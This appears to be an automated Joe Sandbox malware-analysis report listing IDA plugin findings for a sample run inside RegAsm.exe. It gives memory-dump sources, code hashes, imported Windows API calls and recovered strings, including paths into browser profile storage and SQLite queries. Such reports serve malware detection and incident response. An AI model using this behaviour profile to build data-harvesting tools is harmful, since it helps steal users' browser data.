                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Heap$AllocOpenProcessQueryValue
                                              • String ID:
                                              • API String ID: 3676486918-0
                                              • Opcode ID: a2144c8192d29a4efe0118f6c8296b351efe17ba2df171fffd1a983c69a1242c
                                              • Instruction ID: e71daa9729e8068a2842f725c9e4988cb9708c25c23b2ab33cdb3659d8ec7e12
                                              • Opcode Fuzzy Hash: a2144c8192d29a4efe0118f6c8296b351efe17ba2df171fffd1a983c69a1242c
                                              • Instruction Fuzzy Hash: 97F03079240248FFEB115F90DD0AFEE7F7AEB46B04F104024F701A91A0D7B19A909B60
                                              APIs
                                              • GetProcessHeap.KERNEL32(00000000,00000104,?,00000000,?,Version: ,004275CB), ref: 00410A2E
                                              • HeapAlloc.KERNEL32(00000000,?,00000000,?,Version: ,004275CB), ref: 00410A35
                                              • GetLocalTime.KERNEL32(00000000,?,00000000,?,Version: ,004275CB), ref: 00410A41
                                              • wsprintfA.USER32 ref: 00410A6C
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3325415366.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000002.00000002.3325415366.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Heap$AllocLocalProcessTimewsprintf
                                              • String ID:
                                              • API String ID: 1243822799-0
                                              • Opcode ID: 0af70038ec29b6a01a92711a617902467fefcdd575014af2bcb26ad1b7425da6
                                              • Instruction ID: 367e5e9189062848cc71d65be8a9990443451ec89354ec7a893e570611d3fba5
                                              • Opcode Fuzzy Hash: 0af70038ec29b6a01a92711a617902467fefcdd575014af2bcb26ad1b7425da6
                                              • Instruction Fuzzy Hash: 31F012AA900124BBDB50ABD99D09AFF76FDFB0DA06F001042FF41E5190E6388A90D7B0
                                              APIs
                                              • WriteConsoleW.KERNEL32(?,?,?,00000000), ref: 1B881382
                                              • GetLastError.KERNEL32 ref: 1B88138E
                                              • ___initconout.LIBCMT ref: 1B88139E
                                                • Part of subcall function 1B881303: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,1B8813A3), ref: 1B881316
                                              • WriteConsoleW.KERNEL32(?,?,?,00000000), ref: 1B8813B3
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3330714298.000000001B681000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B680000, based on PE: true
                                              • Associated: 00000002.00000002.3330670721.000000001B680000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B688000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B7E6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B88D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331334896.000000001B88F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331334896.000000001B898000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331434789.000000001B8C2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_1b680000_RegAsm.jbxd
                                              Similarity
                                              • API ID: ConsoleWrite$CreateErrorFileLast___initconout
                                              • String ID:
                                              • API String ID: 3431868840-0
                                              • Opcode ID: ee2c0c33c15f118042c2b801396389a00e2110b23c07eefc390e390bb6af7038
                                              • Instruction ID: 29ffef25adb824ac628d7cdddb5f6df27205bcf6a0337e75e965b2301d98043f
                                              • Opcode Fuzzy Hash: ee2c0c33c15f118042c2b801396389a00e2110b23c07eefc390e390bb6af7038
                                              • Instruction Fuzzy Hash: 29F0307A54013BBBCF262FD6DC899CD7F66FB48EA1F014020FA1886524DF36D8649B90
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3330714298.000000001B688000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B680000, based on PE: true
                                              • Associated: 00000002.00000002.3330670721.000000001B680000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B681000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B7E6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B88D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331334896.000000001B88F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331334896.000000001B898000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331434789.000000001B8C2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_1b680000_RegAsm.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: string or blob too big
                                              • API String ID: 0-2803948771
                                              • Opcode ID: 9acf98f72d84beea4c8074ab9376d38a94058cc1f6f92303bbd5da570f604ad2
                                              • Instruction ID: 344b549cf98dc3d432f84adfbefa93e1cc059a623ee674bb1fc3002c629a086d
                                              • Opcode Fuzzy Hash: 9acf98f72d84beea4c8074ab9376d38a94058cc1f6f92303bbd5da570f604ad2
                                              • Instruction Fuzzy Hash: B4A16AF19087868FEB048E28EC417D6B7D1AFA9220F580B1DF4E5873E5E771D4858B85
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3330714298.000000001B7E6000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B680000, based on PE: true
                                              • Associated: 00000002.00000002.3330670721.000000001B680000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B681000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B688000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B88D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331334896.000000001B88F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331334896.000000001B898000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331434789.000000001B8C2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_1b680000_RegAsm.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: %!.15g$-
                                              • API String ID: 0-583212262
                                              • Opcode ID: b7a54c3cb8612d867470b9d52633d08c02cc623a4019f8ef8c435c044facac11
                                              • Instruction ID: 4d8b55f05faf57fe57ef157581e069c0ac2153d24d6b6c0272e93d0a5a9c357a
                                              • Opcode Fuzzy Hash: b7a54c3cb8612d867470b9d52633d08c02cc623a4019f8ef8c435c044facac11
                                              • Instruction Fuzzy Hash: CE918B75A083468FD704DF2DD89179AFBE0EBC8740F44492DE998C7351EBB9D8098B92
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3330714298.000000001B688000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B680000, based on PE: true
                                              • Associated: 00000002.00000002.3330670721.000000001B680000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B681000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B7E6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B88D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331334896.000000001B88F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331334896.000000001B898000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331434789.000000001B8C2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_1b680000_RegAsm.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: string or blob too big
                                              • API String ID: 0-2803948771
                                              • Opcode ID: ef6d74898027ad6eb24876a3ef862428bdf75f63696f96cc2aec2ebde79efefc
                                              • Instruction ID: b5c4d91d2a0d7fad5bfdff2e38cae30630360365683915bd1cfd31f74e2065e6
                                              • Opcode Fuzzy Hash: ef6d74898027ad6eb24876a3ef862428bdf75f63696f96cc2aec2ebde79efefc
                                              • Instruction Fuzzy Hash: 8A81FFF5A053028BC700CF18C882BD7B7E5EFA8710F044968F98597296E775E985CBD2
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3330714298.000000001B688000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B680000, based on PE: true
                                              • Associated: 00000002.00000002.3330670721.000000001B680000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B681000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B7E6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B88D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331334896.000000001B88F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331334896.000000001B898000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331434789.000000001B8C2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_1b680000_RegAsm.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: *$?
                                              • API String ID: 0-2367018687
                                              • Opcode ID: 97b21ccca5d38b48b1aa26f28d019c3cda8d083bcde85287fda522ff660b2b07
                                              • Instruction ID: d80758a8c656623534bf204be00932e6b121106ee3a241f6532283710add6d53
                                              • Opcode Fuzzy Hash: 97b21ccca5d38b48b1aa26f28d019c3cda8d083bcde85287fda522ff660b2b07
                                              • Instruction Fuzzy Hash: DD71F3B0A083529FD7558F38C88479BFBE6EF85600F084A6EF8C687211D775D946CB92
                                              APIs
                                              • _EH_prolog.MSVCRT ref: 0040BC49
                                                • Part of subcall function 0041070B: lstrcpy.KERNEL32(00000000,00000000), ref: 00410735
                                                • Part of subcall function 00410810: _EH_prolog.MSVCRT ref: 00410815
                                                • Part of subcall function 00410810: lstrcpy.KERNEL32(00000000), ref: 00410861
                                                • Part of subcall function 00410810: lstrcat.KERNEL32(?,?), ref: 0041086B
                                                • Part of subcall function 00410884: _EH_prolog.MSVCRT ref: 00410889
                                                • Part of subcall function 00410884: lstrlenA.KERNEL32(?,?,?,?,?,0041874B,?,?,00427BD8,?,00000000,00427716), ref: 004108B1
                                                • Part of subcall function 00410884: lstrcpy.KERNEL32(00000000), ref: 004108D8
                                                • Part of subcall function 00410884: lstrcat.KERNEL32(?,?), ref: 004108E3
                                                • Part of subcall function 004107C9: lstrcpy.KERNEL32(00000000,?), ref: 00410802
                                                • Part of subcall function 00410742: lstrcpy.KERNEL32(00000000,FEE0858D), ref: 00410768
                                                • Part of subcall function 00411AC5: _EH_prolog.MSVCRT ref: 00411ACA
                                                • Part of subcall function 00411AC5: GetFileAttributesA.KERNEL32(00000000,?,0040C672,?,00426CA3,?,?), ref: 00411ADE
                                                • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                • Part of subcall function 0040B616: _EH_prolog.MSVCRT ref: 0040B61B
                                                • Part of subcall function 0040B616: wsprintfA.USER32 ref: 0040B644
                                                • Part of subcall function 0040B616: FindFirstFileA.KERNEL32(?,?), ref: 0040B65B
                                                • Part of subcall function 0040B616: StrCmpCA.SHLWAPI(?,00426F3C), ref: 0040B678
                                                • Part of subcall function 0040B616: StrCmpCA.SHLWAPI(?,00426F40), ref: 0040B692
                                                • Part of subcall function 0040B616: lstrlenA.KERNEL32(00000000,00426C7F,00000000,?,?,?,00426F44,?,?,00426C7E), ref: 0040B742
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3325415366.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000002.00000002.3325415366.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: H_prolog$lstrcpy$Filelstrcatlstrlen$AttributesFindFirstwsprintf
                                              • String ID: .metadata-v2$\storage\default\
                                              • API String ID: 2418158533-762053450
                                              • Opcode ID: 4ddd983ad9ba4f941848d4b7b7757e13a493dcf08297ff2889b28fc747cc79b1
                                              • Instruction ID: 28b1415d24dfa6437f98f288c8e0b38d0f3aa169e87c1d4957936d77c349aed5
                                              • Opcode Fuzzy Hash: 4ddd983ad9ba4f941848d4b7b7757e13a493dcf08297ff2889b28fc747cc79b1
                                              • Instruction Fuzzy Hash: 39619330D05288EACB09FBE5D556BDDBBB46F19308F50415EF415632C2DBB82788CBA6
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3330714298.000000001B688000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B680000, based on PE: true
                                              • Associated: 00000002.00000002.3330670721.000000001B680000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B681000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B7E6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B88D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331334896.000000001B88F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331334896.000000001B898000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331434789.000000001B8C2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_1b680000_RegAsm.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: string or blob too big
                                              • API String ID: 0-2803948771
                                              • Opcode ID: 06ea0b6301dc380eb526b1176686991807b18dd605b5c2e28c65808c26097a4b
                                              • Instruction ID: e2d5bf9cb43205c7f172aec9a488e3fe322e675962361ff3c99a15a28c9bea6b
                                              • Opcode Fuzzy Hash: 06ea0b6301dc380eb526b1176686991807b18dd605b5c2e28c65808c26097a4b
                                              • Instruction Fuzzy Hash: E7415AF78043428FEB108A28FC427DA7B96AF71360F044A39EDD5933D2E626E548C352
                                              Strings
                                              • delayed %dms for lock/sharing conflict at line %d, xrefs: 1B6956D1
                                              • winDelete, xrefs: 1B69569C
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3330714298.000000001B688000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B680000, based on PE: true
                                              • Associated: 00000002.00000002.3330670721.000000001B680000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B681000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B7E6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B88D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331334896.000000001B88F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331334896.000000001B898000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331434789.000000001B8C2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_1b680000_RegAsm.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: delayed %dms for lock/sharing conflict at line %d$winDelete
                                              • API String ID: 0-1405699761
                                              • Opcode ID: 1c0b255680a2634bc185f9b3bf0728d84a4c354ff4e7934852ac540c8a65bd39
                                              • Instruction ID: 916fae0a9aa538bf9e4bdb3acbc5c8f3af561235c176f96adee9498959bf5b65
                                              • Opcode Fuzzy Hash: 1c0b255680a2634bc185f9b3bf0728d84a4c354ff4e7934852ac540c8a65bd39
                                              • Instruction Fuzzy Hash: 4C314CF2E913238FDB042E38BDC89EA7758E761A61F010536E94BC61E1DA21C45CC6A1
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3330714298.000000001B688000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B680000, based on PE: true
                                              • Associated: 00000002.00000002.3330670721.000000001B680000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B681000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B7E6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B88D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331334896.000000001B88F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331334896.000000001B898000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331434789.000000001B8C2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_1b680000_RegAsm.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: string or blob too big
                                              • API String ID: 0-2803948771
                                              • Opcode ID: 39532d4373c88ada7baa3d9a55d627533ff045486c43de5f71f8e5ab46cac0e7
                                              • Instruction ID: 950ecfe416a33ec62cd9414b7c88bb69fe88cf1949916564b0b933cec65874e1
                                              • Opcode Fuzzy Hash: 39532d4373c88ada7baa3d9a55d627533ff045486c43de5f71f8e5ab46cac0e7
                                              • Instruction Fuzzy Hash: 31318EF29042255FDF104D14BC01BE637159BB3326F1842F9F895AB3D2D127E802C2A0
                                              Strings
                                              • SELECT tbl,idx,stat FROM %Q.sqlite_stat1, xrefs: 1B77DF4F
                                              • sqlite_stat1, xrefs: 1B77DF30
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3330714298.000000001B688000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B680000, based on PE: true
                                              • Associated: 00000002.00000002.3330670721.000000001B680000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B681000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B7E6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B88D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331334896.000000001B88F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331334896.000000001B898000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331434789.000000001B8C2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_1b680000_RegAsm.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: SELECT tbl,idx,stat FROM %Q.sqlite_stat1$sqlite_stat1
                                              • API String ID: 0-3572622772
                                              • Opcode ID: e52bddcb15b9a96681a1eff41721a58571ab5d41aa1858e34d28e7c1d30af186
                                              • Instruction ID: 0612183ab5f39e11e0d4674aca02cb34f07aec7ffb0895fb836fe83b3e820ae9
                                              • Opcode Fuzzy Hash: e52bddcb15b9a96681a1eff41721a58571ab5d41aa1858e34d28e7c1d30af186
                                              • Instruction Fuzzy Hash: B921B6B6A013415FDF10EF25EC84EAEB7A4AF81A24B05456CFC94A7251D321F855CBE1
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3330714298.000000001B7E6000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B680000, based on PE: true
                                              • Associated: 00000002.00000002.3330670721.000000001B680000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B681000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B688000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B88D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331334896.000000001B88F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331334896.000000001B898000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331434789.000000001B8C2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_1b680000_RegAsm.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: OsError 0x%lx (%lu)
                                              • API String ID: 0-3720535092
                                              • Opcode ID: 9ae69437e43812a92446b49aab54d3bbbff37b5e33a5bf80a612e02481a91b8e
                                              • Instruction ID: 60bec871c75ddab20128c00d1f8fb53d11ad5df6f10727cfa24bd77f5f6182f6
                                              • Opcode Fuzzy Hash: 9ae69437e43812a92446b49aab54d3bbbff37b5e33a5bf80a612e02481a91b8e
                                              • Instruction Fuzzy Hash: 7F21B3F1681222AFEB04AF64DC89FDB37E8EF04E65F140429F949D6190DB30D958D7A2
                                              Strings
                                              • DROP TABLE '%q'.'%q_node';DROP TABLE '%q'.'%q_rowid';DROP TABLE '%q'.'%q_parent';, xrefs: 1B6AF752
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3330714298.000000001B688000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B680000, based on PE: true
                                              • Associated: 00000002.00000002.3330670721.000000001B680000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B681000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B7E6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B88D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331334896.000000001B88F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331334896.000000001B898000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331434789.000000001B8C2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_1b680000_RegAsm.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: DROP TABLE '%q'.'%q_node';DROP TABLE '%q'.'%q_rowid';DROP TABLE '%q'.'%q_parent';
                                              • API String ID: 0-2071071404
                                              • Opcode ID: 9b8944bc573d7d8cbe45675064b6aa9e0f75616f4ac64bcdb197b70f5c7fd63d
                                              • Instruction ID: 1cdf41b82e7704175725ef8f385df38f8e0a3fa65bfb94989a94bc2b56336c08
                                              • Opcode Fuzzy Hash: 9b8944bc573d7d8cbe45675064b6aa9e0f75616f4ac64bcdb197b70f5c7fd63d
                                              • Instruction Fuzzy Hash: C211ABF5580212AFE6046F39ECC9FEB33ACEB54A15F00012AF905D2190E760FC58CB66
                                              Strings
                                              • InitializeCriticalSectionEx, xrefs: 1B860E84
                                              • GetXStateFeaturesMask, xrefs: 1B860E34
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3330714298.000000001B681000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B680000, based on PE: true
                                              • Associated: 00000002.00000002.3330670721.000000001B680000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B688000.00000020.00001000.00020000.00000000.sdmpDownload File
